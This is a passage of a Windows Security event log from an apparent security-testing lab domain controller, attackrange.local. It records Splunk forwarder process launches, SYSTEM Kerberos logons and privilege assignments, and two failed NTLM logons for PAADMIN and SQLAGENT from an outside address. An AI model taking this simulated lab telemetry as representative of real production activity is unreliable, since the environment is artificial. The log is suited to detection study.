Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:48:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264967
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a60
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:48:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264971
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x89BADD
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:48:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264970
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x89BADD
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53874
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:48:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264969
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x89BADD
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:49:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264972
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xd44
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:49:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264985
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1610
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:49:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264984
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x89C4F3
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:49:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264983
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x89C5E1
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:49:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264982
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x89C629
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:49:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264981
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x89CAE1
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53880
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:49:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264980
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x89CAE1
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:49:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264979
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1050
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:49:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264978
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x89C629
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 53879
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:49:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264977
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x89C629
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:49:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264976
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x89C5E1
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:49:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264975
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x89C5E1
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:49:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264974
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x89C4F3
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53878
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:49:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264973
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x89C4F3
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:49:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264986
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x9f4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:49:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4625
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264987
Keywords=Audit Failure
Message=An account failed to log on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Type: 3
Account For Which Logon Failed:
Security ID: NULL SID
Account Name: PAADMIN
Account Domain:
Failure Information:
Failure Reason: Unknown user name or bad password.
Status: 0xC000006D
Sub Status: 0xC0000064
Process Information:
Caller Process ID: 0x0
Caller Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 176.111.173.250
Source Port: 0
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon request fails. It is generated on the computer where access was attempted.
The Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).
The Process Information fields indicate which account and process on the system requested the logon.
The Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The authentication information fields provide detailed information about this specific logon request.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:49:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4625
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264988
Keywords=Audit Failure
Message=An account failed to log on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Type: 3
Account For Which Logon Failed:
Security ID: NULL SID
Account Name: SQLAGENT
Account Domain:
Failure Information:
Failure Reason: Unknown user name or bad password.
Status: 0xC000006D
Sub Status: 0xC0000064
Process Information:
Caller Process ID: 0x0
Caller Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 176.111.173.250
Source Port: 0
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon request fails. It is generated on the computer where access was attempted.
The Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).
The Process Information fields indicate which account and process on the system requested the logon.
The Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The authentication information fields provide detailed information about this specific logon request.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:49:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264989
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b00
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:49:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264991
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x11b8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:49:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264990
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1888
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
